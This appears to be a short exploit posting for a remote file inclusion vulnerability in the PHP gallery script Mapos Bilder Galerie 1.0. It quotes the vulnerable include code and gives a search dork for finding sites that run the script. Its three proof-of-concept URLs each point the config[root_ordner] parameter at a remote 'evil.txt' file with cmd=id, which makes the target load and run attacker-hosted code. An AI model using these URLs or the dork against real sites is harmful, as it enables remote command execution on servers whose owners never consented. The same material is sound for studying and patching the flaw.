Mapos Bilder Galerie version 1.0 suffers from a remote file inclusion vulnerability.
010487a859a67ed1f1242193f8763d8d1c0aca0f4868ef98513761f226dc0dee
Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability
-----------------------------------------------------------------------
Script : Mapos Bilder Galerie
Version : 1.0
Site : https://www.mapos-scripts.de
Founder : Rizgar
Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)
d0rk : "Copyright (c) 2007 by Mapos-Scripts.de Version 1.0 (Login)", "Mapos Bilder Galerie Version 1.0"
-----------------------------------------------------------------------
Okey, look at nice codes :)
<?php
session_start();
include($config["root_ordner"].'config.php');
if (file_exists($root_ordner.'install.php'))
{
echo "<meta http-equiv='refresh' content='0;URL=install.php'>";
exit;
}
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');
?>
PoC:
https://www.site.com/path/index.php?config[root_ordner]=https://evil.txt?&cmd=id
https://www.site.com/path/galerie.php?config[root_ordner]=https://evil.txt?&cmd=id
https://www.site.com/path/anzagien.php?config[root_ordner]=https://evil.txt?&cmd=id
..
..
..
Eof..